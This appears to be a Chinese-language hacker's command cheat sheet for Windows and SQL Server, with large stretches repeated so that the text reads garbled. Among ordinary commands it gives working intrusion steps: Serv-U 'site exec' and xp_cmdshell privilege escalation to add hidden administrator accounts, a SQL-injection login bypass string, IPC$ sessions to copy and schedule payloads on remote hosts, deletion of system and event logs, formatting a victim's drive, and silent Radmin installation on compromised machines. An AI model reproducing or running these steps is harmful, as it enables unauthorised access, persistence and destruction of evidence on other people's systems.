rar下壓縮與解壓縮
"c:\progra~1\winrar\rar.exe" a d:\web\test\web1.rar d:\web\test\web1
"c:\progra~1\winrar\rar.exe" x d:\web\test\web1.rar d:\web\test\web1
註冊表DOS導入導出命令
regedit -e d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
regedit -s d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
"c:\progra~1\winrar\rar.exe" a d:\web\test\web1.rar d:\web\test\web1
"c:\progra~1\winrar\rar.exe" x d:\web\test\web1.rar d:\web\test\web1
註冊表DOS導入導出命令
regedit -e d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
regedit -s d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
xp下查PID用tasklist win2000下查PID用pulist
殺進程 taskkill /pid id數字
殺進程ntsd -c q -p PID (PID是進程ID數字)
serv-u提權的利用
D:\wwwroot\ftp.exe "r_server.exe /port:7788 /pass:/yourpass /save" (修改radmin密碼和端口)
D:\wwwroot\ftp.exe "net user badwolf nettu /add" (提升WEBshell權限)
D:\wwwroot\ftp.exe "net localgroup administrators 用戶名 /add"(提升WEB權限)
--------------建立1個ftp用戶------------
c:\program files\serv-u\servudaemon.ini
User9=nettu|1|0
殺進程 taskkill /pid id數字
殺進程ntsd -c q -p PID (PID是進程ID數字)
serv-u提權的利用
D:\wwwroot\ftp.exe "r_server.exe /port:7788 /pass:/yourpass /save" (修改radmin密碼和端口)
D:\wwwroot\ftp.exe "net user badwolf nettu /add" (提升WEBshell權限)
D:\wwwroot\ftp.exe "net localgroup administrators 用戶名 /add"(提升WEB權限)
--------------建立1個ftp用戶------------
c:\program files\serv-u\servudaemon.ini
User9=nettu|1|0
[USER=nettu|1]
Password=zf98CFA3B714DEF62C490B8AD477CCAF3D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
然後DOS登陸ftp建立管理員
ftp> quote site exec net user badwolf 65901433 /add
ftp> quote site exec net localgroup administrators badwolf /add
------------------------------------------------------------------------------------------------------------------------------
sql命令
刪除news表裏的ID大於200 和 小於1000之間的內容
delete from news where (id>=200 and id<1000)
Password=zf98CFA3B714DEF62C490B8AD477CCAF3D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
然後DOS登陸ftp建立管理員
ftp> quote site exec net user badwolf 65901433 /add
ftp> quote site exec net localgroup administrators badwolf /add
------------------------------------------------------------------------------------------------------------------------------
sql命令
刪除news表裏的ID大於200 和 小於1000之間的內容
delete from news where (id>=200 and id<1000)
修改admin表下序號(ID)爲1的password值爲123456
update admin set password='123456' where id='1'
------------------------------------------------------------------------------------------------------------------------------
重起機器*.bat放在啓動項裏
@echo off
at 22:00 shutdown -r
cls
-----------------------------------------------------------
新建一個快捷方式,命令如下:
shutdown.exe -a 取消關機
shutdown.exe -s 關閉此計算機
shutdown.exe -f 強行關閉應用程序。
shutdown.exe -m \計算機名 控制遠程計算機。
shutdown.exe -i 顯示圖形用戶界面,但必須是Shutdown的第一個參數。
shutdown.exe -l 註銷當前用戶。
shutdown.exe -s 關閉此計算機
shutdown.exe -r 關機並重啓。
shutdown.exe -t時間 設置關機倒計時。
shutdown.exe -c"消息內容" 輸入關機對話框中的消息內容(不能超127個字符)。
然後在計劃任務訂時運行它就可以了!
---------------------------------DOS命令 - 列目錄------------
dir c:\
dir d:\
---------------------------------DOS命令 - 添加管理員--------
net user badwolf badwolfo /add
net localGroup Administrators badwolf /add
---------------------------------SQL語句---------------------
javascript:s=document.documentElement.outerHTML;document.write
update admin set password='123456' where id='1'
------------------------------------------------------------------------------------------------------------------------------
重起機器*.bat放在啓動項裏
@echo off
at 22:00 shutdown -r
cls
-----------------------------------------------------------
新建一個快捷方式,命令如下:
shutdown.exe -a 取消關機
shutdown.exe -s 關閉此計算機
shutdown.exe -f 強行關閉應用程序。
shutdown.exe -m \計算機名 控制遠程計算機。
shutdown.exe -i 顯示圖形用戶界面,但必須是Shutdown的第一個參數。
shutdown.exe -l 註銷當前用戶。
shutdown.exe -s 關閉此計算機
shutdown.exe -r 關機並重啓。
shutdown.exe -t時間 設置關機倒計時。
shutdown.exe -c"消息內容" 輸入關機對話框中的消息內容(不能超127個字符)。
然後在計劃任務訂時運行它就可以了!
---------------------------------DOS命令 - 列目錄------------
dir c:\
dir d:\
---------------------------------DOS命令 - 添加管理員--------
net user badwolf badwolfo /add
net localGroup Administrators badwolf /add
---------------------------------SQL語句---------------------
javascript:s=document.documentElement.outerHTML;document.write
('');document.body.innerText=s;
exec xp_cmdshell 'net user MyName 123456 /add'
exec xp_cmdshell 'net localGroup Administrators MyName /add'
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
---------------------------------一些命令行---------------------
\=%5c #=%23 asa和asp用迅雷下載
hack.exe 0或1 192.168.0.254 (溢出工具命令)
dir *.pwl /a/s (刪除win98下的用戶)
telnet ip 1234 (telnet對方1234是端口號)
net user badwolf nettu /add (建立用戶)
net localgroup administrators 用戶名 /add (這步是添加用戶到管理組爲管理員)
net use \\IP\ipc$ /user:"用戶名" 密碼 (與遠程IP建立空連接)
net use x: \\192.168.0.254\c$ (做個影射)
type x:\boot.ini (看系統對方)
copy c:\3389.exe \\IP\C$ (拷貝文件過去了)
net time \\192.168.0.254 (看對方時間)
at \\IP 2:40 c:\3389.exe (設定某個時間執行3389重起機器)
at \\192.168.0.254 2:40 /every:2 c:\3389.exe(每月2日2:40執行3379.exe 換成/every:th是每星期4)
net use(查看網絡狀態)
net user(查看所有用戶名)
net user administertor(查看administertor的屬性)
net user administertor 123456(修改administertor的密碼爲123456)
net user administertor /delete(刪除administertor用戶)
net user guest /active:yes(開啓激活GUEST,yes換no爲禁用)
net user hacker /passwordchg:yes(指定hacker用戶可以改自己的密碼,yes換no爲相反)
net user hacker /times:m,12am-2pm (指定hacker用戶可以使用計算機時間,/time:all是任何時間,/time:空
是永遠禁止)
net shaer ipc$(啓動改共享)
net view (列出本地機的當前域中的計算機列表)
net view \\192.168.0.254(查看遠程計算機共享資源)
net start(查看啓動的服務)
net start server(啓動相關服務,start換stop爲禁止服務)
tracert www.163.com (測試本地與163之間經過的計算機)
ping IP(最簡單命令了)
netstat -n(以數字的形式顯示連接的IP和端口)
ftp 192.168.0.254(連接改IP的FTP)
ftp>put c:\3389.exe 3389.exe(copy 3389.exe到FPT上)
ftp>get 123.gif c:\123.gif(下載FTP上的123.gif到本地C:)
mdelete 123.gif(刪除FTP上文件) mkdir abc(FTP上創建abc目錄)bye(退出FTP)
簡單先寫這些啦...
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
------------------------------------------------------------------
開C的默認共享:
那麼,我們鼠標右鍵點我的電腦管理-操作-連接到另1臺計算機上-輸入IP-確定-輸入帳號密碼-OK
點共享文件夾-共享-建立共享-直接輸入c:\-共享名爲c$-下1步完成。
------------------------------------------------------------------
刪除默認共享:
net share(查看本機默認共享)
net share ipc$ /delete(刪除ipc$,同理刪除admin$ c$ d$一樣)
net stop server /y(該服務提供的是RPC支持.文件.打印.命令管道共享.再改1段註冊表是完全刪除默認共項)
[HKEY_LOCAL_MACHINE\System\CurrentControl\Services\lanmanserver\parameters]
下的autoishaerwks-dward-00000000 和 autosharenerver-dward-00000000
------------------------------------------------------------------
查找虛擬主機:
http://whois.webhosting.info/ip
有漏洞後臺萬能密碼:
'or'='or' 'or''='
直接查看網頁源文件:
view-source:http://www.163.com
登陸終端時任務管理器:
CTRL+ALT+END(同本地的ctrl+alt+del)
***後格式化對方的C盤:
format c:/u /q /autotest
-------------------------------------------------------------------
radmin開啓指令:
r_server.exe /install /silence
然後net start r_Server
exec xp_cmdshell 'net localGroup Administrators MyName /add'
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
---------------------------------一些命令行---------------------
\=%5c #=%23 asa和asp用迅雷下載
hack.exe 0或1 192.168.0.254 (溢出工具命令)
dir *.pwl /a/s (刪除win98下的用戶)
telnet ip 1234 (telnet對方1234是端口號)
net user badwolf nettu /add (建立用戶)
net localgroup administrators 用戶名 /add (這步是添加用戶到管理組爲管理員)
net use \\IP\ipc$ /user:"用戶名" 密碼 (與遠程IP建立空連接)
net use x: \\192.168.0.254\c$ (做個影射)
type x:\boot.ini (看系統對方)
copy c:\3389.exe \\IP\C$ (拷貝文件過去了)
net time \\192.168.0.254 (看對方時間)
at \\IP 2:40 c:\3389.exe (設定某個時間執行3389重起機器)
at \\192.168.0.254 2:40 /every:2 c:\3389.exe(每月2日2:40執行3379.exe 換成/every:th是每星期4)
net use(查看網絡狀態)
net user(查看所有用戶名)
net user administertor(查看administertor的屬性)
net user administertor 123456(修改administertor的密碼爲123456)
net user administertor /delete(刪除administertor用戶)
net user guest /active:yes(開啓激活GUEST,yes換no爲禁用)
net user hacker /passwordchg:yes(指定hacker用戶可以改自己的密碼,yes換no爲相反)
net user hacker /times:m,12am-2pm (指定hacker用戶可以使用計算機時間,/time:all是任何時間,/time:空
是永遠禁止)
net shaer ipc$(啓動改共享)
net view (列出本地機的當前域中的計算機列表)
net view \\192.168.0.254(查看遠程計算機共享資源)
net start(查看啓動的服務)
net start server(啓動相關服務,start換stop爲禁止服務)
tracert www.163.com (測試本地與163之間經過的計算機)
ping IP(最簡單命令了)
netstat -n(以數字的形式顯示連接的IP和端口)
ftp 192.168.0.254(連接改IP的FTP)
ftp>put c:\3389.exe 3389.exe(copy 3389.exe到FPT上)
ftp>get 123.gif c:\123.gif(下載FTP上的123.gif到本地C:)
mdelete 123.gif(刪除FTP上文件) mkdir abc(FTP上創建abc目錄)bye(退出FTP)
簡單先寫這些啦...
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
------------------------------------------------------------------
開C的默認共享:
那麼,我們鼠標右鍵點我的電腦管理-操作-連接到另1臺計算機上-輸入IP-確定-輸入帳號密碼-OK
點共享文件夾-共享-建立共享-直接輸入c:\-共享名爲c$-下1步完成。
------------------------------------------------------------------
刪除默認共享:
net share(查看本機默認共享)
net share ipc$ /delete(刪除ipc$,同理刪除admin$ c$ d$一樣)
net stop server /y(該服務提供的是RPC支持.文件.打印.命令管道共享.再改1段註冊表是完全刪除默認共項)
[HKEY_LOCAL_MACHINE\System\CurrentControl\Services\lanmanserver\parameters]
下的autoishaerwks-dward-00000000 和 autosharenerver-dward-00000000
------------------------------------------------------------------
查找虛擬主機:
http://whois.webhosting.info/ip
有漏洞後臺萬能密碼:
'or'='or' 'or''='
直接查看網頁源文件:
view-source:http://www.163.com
登陸終端時任務管理器:
CTRL+ALT+END(同本地的ctrl+alt+del)
***後格式化對方的C盤:
format c:/u /q /autotest
-------------------------------------------------------------------
radmin開啓指令:
r_server.exe /install /silence
然後net start r_Server
RADMIN的安裝命令是:
RADMIN是遠程控制文件對肉雞管理功能強大!但是他不屬於***類軟件,所以不會被殺,但是容易發現。其實現在也他媽的殺了!當然看你用的哪個版本!
RADMIN是遠程控制文件對肉雞管理功能強大!但是他不屬於***類軟件,所以不會被殺,但是容易發現。其實現在也他媽的殺了!當然看你用的哪個版本!
隱藏安裝
RADMIN的安裝命令是:
r_server.exe /install /silence /pass:** /port:** /save